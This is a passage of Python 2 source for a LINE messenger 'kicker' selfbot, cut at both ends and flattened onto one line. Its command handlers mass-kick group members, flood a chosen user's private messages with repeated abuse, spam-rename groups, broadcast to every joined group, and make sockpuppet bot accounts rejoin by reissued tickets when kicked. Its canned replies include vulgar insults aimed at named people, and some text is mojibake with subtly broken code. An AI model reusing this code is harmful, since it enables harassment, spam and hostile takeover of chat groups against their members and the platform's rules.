Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Invitation Protect:off 􀜁􀄰􏿿\n" if wait["cancelprotect"] == True: md+="􀜁􀇔􏿿 Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) elif "album merit " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album merit ","") album = cl.getAlbum(gid) if album["result"]["items"] == []: if wait["lang"] == "JP": cl.sendText(msg.to,"There is no album") else: cl.sendText(msg.to,"相册没在。") else: if wait["lang"] == "JP": mg = "The following is the target album" else: mg = "以下是对象的相册" for y in album["result"]["items"]: if "photoCount" in y: mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n" else: mg += str(y["title"]) + ":0sheet\n" cl.sendText(msg.to,mg) elif "album " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album ","") album = cl.getAlbum(gid) if album["result"]["items"] == []: if wait["lang"] == "JP": cl.sendText(msg.to,"There is no album") else: cl.sendText(msg.to,"相册没在。") else: if wait["lang"] == "JP": mg = "The following is the target album" else: mg = "以下是对象的相册" for y in album["result"]["items"]: if "photoCount" in y: mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n" else: mg += str(y["title"]) + ":0sheet\n" elif "album remove " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album remove ","") albums = cl.getAlbum(gid)["result"]["items"] i = 0 if albums != []: for album in albums: cl.deleteAlbum(gid,album["id"]) i += 1 if wait["lang"] == "JP": cl.sendText(msg.to,str(i) + "Deleted albums") else: cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚") elif msg.text in ["Group id","群組全id"]: if msg.from_ in admin: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) elif msg.text in ["Cancelall"]: if msg.from_ in admin: gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"All invitations have been refused") else: cl.sendText(msg.to,"拒绝了全部的邀请。") elif "album remove→" in msg.text: if msg.from_ in admin: gid = msg.text.replace("album remove→","") albums = cl.getAlbum(gid)["result"]["items"] i = 0 if albums != []: for album in albums: cl.deleteAlbum(gid,album["id"]) i += 1 if wait["lang"] == "JP": cl.sendText(msg.to,str(i) + "Albums deleted") else: cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚") elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]: if msg.from_ in admin: if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了开。") elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]: if msg.from_ in admin: if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了关断。") elif "Message change: " in msg.text: if msg.from_ in admin: wait["message"] = msg.text.replace("Message change: ","") cl.sendText(msg.to,"message changed") elif "Message add: " in msg.text: if msg.from_ in admin: wait["message"] = msg.text.replace("Message add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"message changed") else: cl.sendText(msg.to,"done。") elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•å€™èªžç¢ºèª"]: if msg.from_ in admin: if wait["lang"] == "JP": cl.sendText(msg.to,"message change to\n\n" + wait["message"]) else: cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"]) elif "Comment:" in msg.text: if msg.from_ in admin: c = msg.text.replace("Comment:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"message changed") else: wait["comment"] = c cl.sendText(msg.to,"changed\n\n" + c) elif "Add comment:" in msg.text: if msg.from_ in admin: c = msg.text.replace("Add comment:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"String that can not be changed") else: wait["comment"] = c cl.sendText(msg.to,"changed\n\n" + c) elif msg.text in ["コメンãƒ��:オン","Comment on","Comment:on","自å‹���é¦–é ç•™è¨€ï¼šé–‹"]: if msg.from_ in admin: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"already on") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了开。") elif msg.text in ["コメント:オフ","Comment on","Comment off","è‡ªå‹•é¦–é ç•™è¨€ï¼šé—œ"]: if msg.from_ in admin: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"already off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了关断。") elif msg.text in ["Comment","留言確認"]: if msg.from_ in admin: cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"])) elif msg.text in ["Gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False cl.updateGroup(x) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False ki.updateGroup(x) gurl = ki.reissueGroupTicket(msg.to) ki.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False kk.updateGroup(x) gurl = kk.reissueGroupTicket(msg.to) kk.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False kc.updateGroup(x) gurl = kc.reissueGroupTicket(msg.to) kc.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Comment bl "]: if msg.from_ in admin: wait["wblack"] = True cl.sendText(msg.to,"add to comment bl") elif msg.text in ["Comment wl "]: if msg.from_ in admin: wait["dblack"] = True cl.sendText(msg.to,"wl to comment bl") elif msg.text in ["Comment bl confirm"]: if msg.from_ in admin: if wait["commentBlack"] == {}: cl.sendText(msg.to,"confirmed") else: cl.sendText(msg.to,"Blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text in ["Jam on"]: if msg.from_ in admin: if wait["clock"] == True: cl.sendText(msg.to,"already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"(%H:%M)") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"done") elif msg.text in ["Jam off"]: if msg.from_ in admin: if wait["clock"] == False: cl.sendText(msg.to,"already off") else: wait["clock"] = False cl.sendText(msg.to,"done") elif msg.text in ["Change clock "]: if msg.from_ in admin: n = msg.text.replace("Change clock ","") if len(n.decode("utf-8")) > 13: cl.sendText(msg.to,"changed") else: wait["cName"] = n cl.sendText(msg.to,"changed to\n\n" + n) elif msg.text in ["Up"]: if msg.from_ in admin: if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"(%H:%M)") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Updated") else: cl.sendText(msg.to,"Please turn on the name clock") elif msg.text == "cek": if msg.from_ in admin: cl.sendText(msg.to, "Check sider") try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['ROM'][msg.to] = {} print wait2 elif msg.text == "Result": if msg.from_ in admin: if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: chiya = "" else: chiya = "" for rom in wait2["ROM"][msg.to].items(): print rom chiya += rom[1] + "\n" cl.sendText(msg.to, "Readed By %s\nthat's it\n\nignored By\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to])) else: cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪") #----------------------------------------------- #----------------------------------------------- elif msg.text in ["Masuk","Jarvis"]: if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = True cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) kk.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) kc.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) G = cl.getGroup(msg.to) G.preventJoinByTicket = True ki.updateGroup(G) print "kicker ok" G.preventJoinByTicket(G) ki.updateGroup(G) elif msg.text in ["Cv1 join"]: if msg.from_ in admin: X = cl.getGroup(msg.to) X.preventJoinByTicket = True cl.updateGroup(X) invsend = 0 Ti = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ti) G = kk.getGroup(msg.to) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = kk.reissueGroupTicket(msg.to) elif msg.text in ["Cv2 join"]: if msg.from_ in admin: X = cl.getGroup(msg.to) X.preventJoinByTicket = False cl.updateGroup(X) invsend = 0 Ti = cl.reissueGroupTicket(msg.to) kk.acceptGroupInvitationByTicket(msg.to,Ti) G = ki.getGroup(msg.to) G.preventJoinByTicket = True kk.updateGroup(G) Ticket = kk.reissueGroupTicket(msg.to) #----------------------------------------------- #.acceptGroupInvitationByTicket(msg.to,Ticket) elif msg.text in ["Cv3 join"]: if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = False cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) kc.acceptGroupInvitationByTicket(msg.to,Ticket) print "kicker ok" G.preventJoinByTicket = True kc.updateGroup(G) #----------------------------------------------- elif msg.text in ["Out","out"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: bot1.leaveGroup(msg.to) bot2.leaveGroup(msg.to) bot3.leaveGroup(msg.to) bot4.leaveGroup(msg.to) except: pass elif msg.text in ["Bye 1"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) except: pass elif msg.text in ["Bye 2"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) kk.leaveGroup(msg.to) except: pass elif msg.text in ["Cv1 @bye"]: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) except: pass elif msg.text in ["Cv2 @bye"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: kk.leaveGroup(msg.to) except: pass elif msg.text in ["Cv3 @bye"]: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: kc.leaveGroup(msg.to) except: pass #----------------------------------------------- elif msg.text in ["Mentionall"]: if msg.from_ in admin: group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] cb = "" cb2 = "" strt = int(0) akh = int(0) for md in nama: akh = akh + int(5) cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},""" strt = strt + int(6) akh = akh + 1 cb2 += "@nrik\n" cb = (cb[:int(len(cb)-1)]) msg.contentType = 0 msg.text = cb2 msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'} try: kk.sendMessage(msg) except Exception as error: print error #----------------------------------------------- elif ms.text in ["Kill"]: if msg.from_ in admin: if msg.toType == 2: group = ki.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: kk.sendText(msg.to,"Fuck You") kc.sendText(msg.to,"Fuck You") return for jj in matched_list: try: klist=[ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass elif "Cleanse" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "ok" _name = msg.text.replace("Cleanse","") gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) gs = kc.getGroup(msg.to) ki.sendText(msg.to,"Just some casual cleansing ô") kk.sendText(msg.to,"Group cleansed.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found.") kk.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: ki.sendText(msg.to,"Group cleanse") kk.sendText(msg.to,"Group cleanse") elif "Nk " in msg.text: if msg.from_ in admin: if msg.from_ in admin: nk0 = msg.text.replace("Nk ","") nk1 = nk0.lstrip() nk2 = nk1.replace("@","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: klist=[cl,ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: ki.sendText(msg.to,"Succes Cv") kk.sendText(msg.to,"Fuck You") elif "Blacklist @ " in msg.text: if msg.from_ in admin: _name = msg.text.replace("Blacklist @ ","") _kicktarget = _name.rstrip(' ') gs = ki2.getGroup(msg.to) targets = [] for g in gs.members: if _kicktarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Not found") else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) k3.sendText(msg.to,"Succes Cv") except: ki.sendText(msg.to,"error") elif "Ban @" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "[Ban]ok" _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip(' ') gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") except: ki.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "[Unban]ok" _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip(' ') gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) gs = kc.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") except: ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text in ["Gua Mau Masuk Team Kamu"]: cl.sendText(msg.to,"Silakan Masuk http://line.me/R/ti/g/OTsF9L6bzv Jangan Hack ya Kak") #----------------------------------------------- elif msg.text in ["About","Own"]: ki.sendText(msg.to,"Owner : line.me/ti/p/~naufal_opalminecraft") #----------------------------------------------- elif msg.text in ["hmm"]: ki.sendText(msg.to,"Indro ama aby homoan gue") elif msg.text in [":v"]: ki.sendText(msg.to,"apasih sayang") elif msg.text in ["wkwkwk"]: ki.sendText(msg.to,"The Cyber Kicker the best ler") elif msg.text in ["tommy"]: ki.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") kc.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") elif msg.text in ["#welcome"]: ki.sendText(msg.to,"Selamat datang di Grup jones") kk.sendText(msg.to,"Jangan nakal ok!") #----------------------------------------------- elif msg.text in ["PING","Ping","ping","Samlekom","samlekom"]: ki.sendText(msg.to,"Mamanx 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Ngentod 􀜁􀅔Har Har􏿿") kc.sendText(msg.to,"Yuuk 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text in ["Responsename","responsename"]: if msg.from_ in admin: cl.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot1.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot2.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot3.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot4.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text == "Setlastpoint": if msg.from_ in admin: cl.sendText(msg.to, "ƧЄƬ ƬHЄ ԼƛƧƬƧЄЄƝƧ' ƤƠƖƝƬ(`・ω・´)") try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] except: pass now2 = datetime.now() wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M") wait2['ROM'][msg.to] = {} print wait2 elif msg.text == "Viewlastseen": if msg.from_ in admin: if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: chiya = "" else: chiya = "" for rom in wait2["ROM"][msg.to].items(): print rom chiya += rom[1] + "\n" cl.sendText(msg.to, " %s\n\n\nPeople who have ignored reads\n(`・ω・´)\n%s\n\nThese anu anu uesrs have seen at the lastseen point(`・ω・´)\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to])) else: cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen") #----------------------------------------------- elif msg.text in ["Sp","Speed","speed"]: if msg.from_ in admin: start = time.time() cl.sendText(msg.to, "Tunggu Napa...") elapsed_time = time.time() - start cl.sendText(msg.to, "%sseconds" % (elapsed_time)) #------------------------------------------------------------------ elif msg.text in ["Ban"]: if msg.from_ in admin: wait["wblacklist"] = True cl.sendText(msg.to,"send contact") elif msg.text in ["Unban"]: if msg.from_ in admin: wait["dblacklist"] = True cl.sendText(msg.to,"send contact") elif msg.text in ["Banlist"]: if msg.from_ in admin: if wait["blacklist"] == {}: cl.sendText(msg.to,"nothing") else: cl.sendText(msg.to,"Blacklist user") mc = "" for mi_d in wait["blacklist"]: mc += "->" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text in ["Cek ban"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) cocoa = "" for mm in matched_list: cocoa += mm + "\n" cl.sendText(msg.to,cocoa + "") elif msg.text in ["Kill ban"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"There was no blacklist user") return for jj in matched_list: cl.kickoutFromGroup(msg.to,[jj]) cl.sendText(msg.to,"wkwkw 􀜁􀅔Har Har􏿿") elif msg.text in ["Clear"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.invitee] for _mid in gMembMids: cl.cancelGroupInvitation(msg.to,[_mid]) cl.sendText(msg.to,"I pretended to cancel and canceled.") elif "random:" in msg.text: if msg.from_ in admin: if msg.toType == 2: strnum = msg.text.replace("random:","") source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|' try: num = int(strnum) group = cl.getGroup(msg.to) for var in range(0,num): name = "".join([random.choice(source_str) for x in xrange(10)]) time.sleep(0.01) group.name = name cl.updateGroup(group) except: cl.sendText(msg.to,"Error") elif "album→" in msg.text: if msg.from_ in admin: try: albumtags = msg.text.replace("album→","") gid = albumtags[:6] name = albumtags.replace(albumtags[:34],"") cl.createAlbum(gid,name) cl.sendText(msg.to,name + "created an album") except: cl.sendText(msg.to,"Error") elif "fakec→" in msg.text: if msg.from_ in admin: try: source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|' name = "".join([random.choice(source_str) for x in xrange(10)]) anu = msg.text.replace("fakec→","") cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu))) except Exception as e: try: cl.sendText(msg.to,str(e)) except: pass #-------------Fungsi Tagall User Start---------------# elif msg.text in ["Tag all"]: if msg.from_ in admin: group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] cb = "" cb2 = "" strt = int(0) akh = int(0) for md in nama: akh = akh + int(6) cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},""" strt = strt + int(7) akh = akh + 1 cb2 += "@nrik \n" cb = (cb[:int(len(cb)-1)]) msg.contentType = 0 msg.text = cb2 msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'} try: ki.sendMessage(msg) except Exception as error: print error #-------------Fungsi Tagall User Finish By :Naufal -------------# elif "Contact bc " in msg.text: if msg.from_ in admin: bctxt = msg.text.replace("Contact bc ", "") t = cl.getAllContactIds() t = 5 while(t): cl.sendText(msg.to, (bctxt)) t-=1 elif msg.text in ["Aby"]: ki.sendText(msg.to,"Homoan gue muehehe") elif "Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot1.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot2.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot3.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot4.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") cl.sendText(msg.to, "Done") print " Spammed !" elif msg.text in ["anjir","Anjir"]: cl.sendText(msg.to,"Astaga kak jangan kasar dong") elif msg.text in ["ANJAY","Anjay","anjay"]: cl.sendText(msg.to,"Santai dong ngentot !") elif msg.text in ["Ilham","Ham","ilham","ham","Star"]: cl.sendText(msg.to,"Lagi coli dia bang") elif msg.text in ["List group","Glist"]: if msg.from_ in admin: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[⭐] %s \n" % (cl.getGroup(i).name + " | Members : " + str(len (cl.getGroup(i).members))) cl.sendText(msg.to, "☆「Group List」☆\n"+ h +"Total Group : " +str(len(gid))) elif "Mid @" in msg.text: _name = msg.text.replace("Mid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif msg.text in ["Creator","Pembuat bot"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': 'uc8e2c2b906e2322592c6d8f91a0957f7'} cl.sendMessage(msg) cl.sendText(msg.to,"Itu Creator Saya ") #-------------Fungsi Spam Start---------------------# elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]: if msg.from_ in admin: cl.sendText(msg.to,"ANJAY") #-------------Fungsi Spam Finish---------------------# elif "Group bc " in msg.text: bctxt = msg.text.replace("Group bc ", "") n = cl.getGroupIdsJoined() for manusia in n: cl.sendText(manusia, (bctxt)) elif ("Bye " in msg.text): if msg.from_ in admin: key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] targets = [] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: pass elif "/InviteMeTo: " in msg.text: if msg.from_ in admin: gid = msg.text.replace("/InviteMeTo: ","") if gid == "": cl.sendText(msg.to,"Invalid group id") else: try: cl.findAndAddContactsByMid(msg.from_) cl.inviteIntoGroup(gid,[msg.from_]) except: cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu") elif msg.text in ["Gr on","gr on"]: if msg.from_ in admin: if wait["Protectgr"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protect Group On") else: cl.sendText(msg.to,"done") else: wait["Protectgr"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect Group On") else: cl.sendText(msg.to,"done") #----------------------------------------------- #----------------------------------------------- if op.type == 19: try: if op.param3 in mid: if op.param2 in kimid: G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) else: G = ki.getGroup(op.param1) ki.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) ki.updateGroup(G) wait["blacklist"][op.param2] = True elif op.param3 in kimid: if op.param2 in ki2mid: G = ki2.getGroup(op.param1) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki2.updateGroup(G) else: G = ki2.getGroup(op.param1) ki2.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki.updateGroup(G) elif op.param3 in ki3mid: if op.param2 in ki2mid: G = ki2.getGroup(op.param1) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki2.updateGroup(G) else: G = cl.getGroup(op.param1) ki2.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki2.updateGroup(G) Ticket = ki2.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki2.updateGroup(G) elif op.param3 in ki2mid: if op.param2 in ki3mid: G = ki3.getGroup(op.param1) 